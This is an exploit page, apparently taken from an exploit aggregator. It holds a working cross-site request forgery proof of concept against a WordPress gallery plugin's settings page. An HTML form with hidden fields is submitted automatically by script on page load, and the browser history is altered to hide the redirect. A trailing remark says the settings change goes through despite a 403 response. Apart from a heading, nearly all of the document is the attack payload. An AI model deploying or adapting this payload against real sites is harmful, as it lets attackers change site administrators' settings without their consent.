Share
## https://sploitus.com/exploit?id=WPEX-ID:49B3A8CB-F606-4CF7-80EC-BFDAFD74E848
<html>
  <body>
    <form action="http://WP/wp-admin/options-general.php" method="POST">
      <input type="hidden" name="bar_size" value="anything" />
      <input type="hidden" name="indexIndicatorSep" value="anything" />
      <input type="hidden" name="loop_images" value="1" />
      <input type="hidden" name="show_close_element" value="1" />
      <input type="hidden" name="show_fullscreen_element" value="1" />
      <input type="hidden" name="show_zoom_element" value="1" />
      <input type="hidden" name="show_share_element" value="1" />
      <input type="hidden" name="show_counter_element" value="1" />
      <input type="hidden" name="show_arrow_element" value="1" />
      <input type="hidden" name="show_preloader_element" value="1" />
      <input type="hidden" name="tap_to_toggle_controls" value="1" />
      <input type="hidden" name="photoswipe_save" value="Save Settings" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>


the response of the request above is 403, but the settings update still happens